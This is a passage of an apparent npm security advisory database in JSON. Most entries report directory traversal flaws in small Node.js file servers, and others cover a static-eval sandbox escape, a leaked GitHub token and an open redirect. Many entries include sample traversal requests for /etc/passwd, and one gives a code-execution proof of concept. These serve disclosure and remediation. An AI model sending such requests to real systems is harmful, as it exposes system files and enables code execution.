"created_at": "2017-06-30T17:47:51.665+00:00",
"updated_at": "2017-10-25T02:47:47.849+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "nodeload-nmickuli",
"publish_date": "2017-10-25T02:47:47.847+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "nodeload-nmickuli_directory-traversal",
"overview": "`nodeload-nmickuli` is a module for load testing HTTP services.\n\n`nodeload-nmickuli` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/nodeload-nmickuli)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 409,
"created_at": "2017-06-30T17:26:35.543+00:00",
"updated_at": "2017-10-25T02:47:34.198+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "wenluhong1",
"publish_date": "2017-10-25T02:47:34.196+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "wenluhong1_directory-traversal",
"overview": "`wenluhong1` is a simple file server.\n\n`wenluhong1` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/wenluhong1)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 408,
"created_at": "2017-06-30T16:54:53.326+00:00",
"updated_at": "2017-10-25T02:47:15.143+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "city-weather-abe",
"publish_date": "2017-10-25T02:47:15.142+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "city-weather-abe_directory-traversal",
"overview": "`city-weather-abe` is a server that returns the weather from cities in Utah. \n\n`city-weather-abe` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/city-weather-abe)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 548,
"created_at": "2017-10-17T23:19:54.009+00:00",
"updated_at": "2017-10-18T22:15:49.039+00:00",
"title": "Sandbox Breakout / Arbitrary Code Execution",
"author": "Matt Austin",
"module_name": "static-eval",
"publish_date": "2017-10-18T22:15:49.038+00:00",
"cves": [],
"vulnerable_versions": "<=1.1.1",
"patched_versions": ">=2.0.0",
"slug": "static-eval_sandbox-breakout-arbitrary-code-execution",
"overview": "The `static-eval` module is intended to evaluate statically-analyzable expressions.\n\nIn affected versions, untrusted user input is able to access the global function constructor, effectively allowing arbitrary code execution.\n\nProof of concept:\n```\nvar evaluate = require('static-eval');\nvar parse = require('esprima').parse;\nvar src = '(function(){console.log(process.pid)})()';\nvar ast = parse(src).body[0].expression;\nvar res = evaluate(ast, {});\n// Will print the process id\n```",
"recommendation": "Upgrade to v2.0.0 or later.",
"references": "- https://maustin.net/articles/2017-10/static_eval\n- https://github.com/substack/static-eval/pull/18",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 6.2,
"cwe": "20"
},
{
"id": 546,
"created_at": "2017-10-12T19:20:12.92+00:00",
"updated_at": "2017-10-13T23:37:30.167+00:00",
"title": "Github Token Leak",
"author": "David Dias",
"module_name": "aegir",
"publish_date": "2017-10-13T23:37:30.166+00:00",
"cves": [],
"vulnerable_versions": ">=12.0.0 <= 12.0.7",
"patched_versions": ">= 12.0.8",
"slug": "aegir_github-token-leak",
"overview": "aegir is a module to help automate JavaScript project management.\n\nVersion 12.0.0 through and including 12.0.7 bundled and published to npm the user (that peformed a aegir-release) GitHub token.",
"recommendation": "Upgrade to aegir version 12.0.8 or greater.\n\nIf you used this module to do a release for your project you should invalidate the GitHub tokens that were leaked.",
"references": null,
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
"cvss_score": 8.2,
"cwe": "200"
},
{
"id": 547,
"created_at": "2017-10-13T18:54:37.511+00:00",
"updated_at": "2017-10-13T23:01:42.776+00:00",
"title": "Open Redirect",
"author": "Xin Gao",
"module_name": "st",
"publish_date": "2017-10-13T23:01:42.775+00:00",
"cves": [],
"vulnerable_versions": "<=1.2.1",
"patched_versions": ">=1.2.2",
"slug": "st_open-redirect",
"overview": "st is a module for serving static files.\n\nAn attacker is able to craft a request that results in an `HTTP 301` (redirect) to an entirely different domain. \n\nA request for: `http://some.server.com//nodesecurity.org/%2e%2e` would result in a 301 to `//nodesecurity.org/%2e%2e` which most browsers treat as a proper redirect as `//` is translated into the current schema being used.\n\nMitigating factor: \n\nIn order for this to work, `st` must be serving from the root of a server (`/`) rather than the typical sub directory (`/static/`) and the redirect URL will end with some form of URL encoded `..` (\"%2e%2e\", \"%2e.\", \".%2e\"). \n\nCode example (provided by Xin Gao): \n\n[example.js]\n\n```\nvar st = require('st') \nvar http = require('http') \nhttp.createServer(st(process.cwd())).listen(1337)\n```\n\n```\n$ curl -v http://localhost:1337//cve.mitre.com/%2e%2e\n* Trying ::1...\n* TCP_NODELAY set\n* Connected to localhost (::1) port 1337 (#0)\n> GET //cve.mitre.com/%2e%2e HTTP/1.1\n> Host: localhost:1337\n> User-Agent: curl/7.54.0\n> Accept: */*\n>\n< HTTP/1.1 301 Moved Permanently\n< cache-control: public, max-age=600\n< last-modified: Fri, 13 Oct 2017 22:56:33 GMT\n< etag: \"16777220-46488904-1507935393000\"\n< location: //cve.mitre.com/%2e%2e/\n< Date: Fri, 13 Oct 2017 22:56:41 GMT\n< Connection: keep-alive\n< Content-Length: 30\n<\n* Connection #0 to host localhost left intact\n```",
"recommendation": "Upgrade to v1.2.2 or later.",
"references": "Thank you Rod Vagg for fixing this vulnerability in st and communicating it to nsp.",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"cvss_score": 4.3,
"cwe": "601"
},
{
"id": 446,
"created_at": "2017-07-13T22:03:08.347+00:00",
"updated_at": "2017-10-10T22:19:19.775+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "nodeaaaaa",
"publish_date": "2017-10-10T22:19:19.774+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.9999",
"patched_versions": "<0.0.0",
"slug": "nodeaaaaa_directory-traversal",
"overview": "`nodeaaaaa` is a static file server.\n\n`nodeaaaaa` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/nodeaaaaa)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 415,
"created_at": "2017-07-05T18:46:40.619+00:00",
"updated_at": "2017-10-10T22:08:42.233+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "elding",
"publish_date": "2017-10-10T22:08:42.232+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "elding_directory-traversal",
"overview": "`elding` is a simple web server.\n\n`elding` is vulnerable to a directory traversal issue, allowing an attacker to access the filesystem by placing \"../\" in the url. \nThe files accessible, however, are limited to files with a file extension. Sending a `GET` request to `/../../../etc/passwd`, for example, will return a 404 on etc/passwd/index.js.",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/elding)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"cvss_score": 5.3,
"cwe": "26"
},
{
"id": 416,
"created_at": "2017-07-05T19:57:28.843+00:00",
"updated_at": "2017-10-10T22:08:21.178+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "yzt",
"publish_date": "2017-10-10T22:08:21.177+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "yzt_directory-traversal",
"overview": "`yzt` is a simple file server.\n\n`yzt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yzt)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 417,
"created_at": "2017-07-05T20:04:35.754+00:00",
"updated_at": "2017-10-10T22:07:57.135+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "wind-mvc",
"publish_date": "2017-10-10T22:07:57.134+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "wind-mvc_directory-traversal",
"overview": "`wind-mvc` is an mvc framework.\n\n`wind-mvc` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/wind-mvc)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 441,
"created_at": "2017-07-07T22:05:33.078+00:00",
"updated_at": "2017-10-10T22:01:18.502+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "yttivy",
"publish_date": "2017-10-10T22:01:18.501+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "yttivy_directory-traversal",
"overview": "`yttivy` is a static file server.\n\n`yttivy` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yttivy)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 444,
"created_at": "2017-07-07T22:47:12.029+00:00",
"updated_at": "2017-10-10T22:01:12.926+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "dgard8.lab6",
"publish_date": "2017-10-10T22:01:12.925+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "dgard8lab6_directory-traversal",
"overview": "`dgard8.lab6` is a static file server.\n\n`dgard8.lab6` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dgard8.lab6)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 449,
"created_at": "2017-07-17T20:39:28.595+00:00",
"updated_at": "2017-10-10T22:00:25.844+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "fbr-client",
"publish_date": "2017-10-10T22:00:25.842+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.9999",
"patched_versions": "<0.0.0",
"slug": "fbr-client_directory-traversal",
"overview": "`fbr-client` sends files through sockets via socket.io and webRTC.\n\n`fbr-client` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/fbr-client)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "26"
},
{
"id": 418,
"created_at": "2017-07-05T21:00:13.628+00:00",
"updated_at": "2017-10-09T21:07:42.327+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "tencent-server",
"publish_date": "2017-10-09T21:07:37.27+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "tencent-server_directory-traversal",
"overview": "`tencent-server` is a simple web server.\n\n`tencent-server` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/tencent-server)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 419,
"created_at": "2017-07-05T21:17:30.25+00:00",
"updated_at": "2017-10-09T21:07:31.286+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "sgqserve",
"publish_date": "2017-10-09T21:07:31.285+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "sgqserve_directory-traversal",
"overview": "`sgqserve` is a simple file server.\n\n`sgqserve` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [POC from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/sgqserve)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 420,
"created_at": "2017-07-05T21:29:36.915+00:00",
"updated_at": "2017-10-09T21:07:24.162+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "peiserver",
"publish_date": "2017-10-09T21:07:24.161+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "peiserver_directory-traversal",
"overview": "`peiserver` is a static file server.\n\n`peiserver` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/peiserver)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 421,
"created_at": "2017-07-05T21:37:33.964+00:00",
"updated_at": "2017-10-09T21:07:18.016+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "mfrserver",
"publish_date": "2017-10-09T21:07:18.015+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "mfrserver_directory-traversal",
"overview": "`mfrserver` is a simple file server.\n\n`mfrserver` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/mfrserver)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 422,
"created_at": "2017-07-05T21:40:50.328+00:00",
"updated_at": "2017-10-09T21:07:10.857+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "ltt",
"publish_date": "2017-10-09T21:07:10.857+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "ltt_directory-traversal",
"overview": "`ltt` is a static file server.\n\n`ltt` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/ltt)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 423,
"created_at": "2017-07-05T21:45:05.139+00:00",
"updated_at": "2017-10-09T21:07:02.727+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "lessindex",
"publish_date": "2017-10-09T21:07:02.727+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "lessindex_directory-traversal",
"overview": "`lessindex` is a static file server.\n\n`lessindex` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/lessindex)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 424,
"created_at": "2017-07-05T22:30:34.253+00:00",
"updated_at": "2017-10-09T21:06:54.187+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "jn_jj_server",
"publish_date": "2017-10-09T21:06:54.186+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",